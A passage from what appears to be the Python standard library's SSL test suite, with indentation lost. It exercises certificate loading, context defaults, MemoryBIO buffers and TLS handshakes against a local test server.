with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
@unittest.skipUnless(_have_threads, "Needs threading module")
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# this should succeed because we specify the root cert
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SIGNING_CA)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, 'localhost')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
if _have_threads:
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
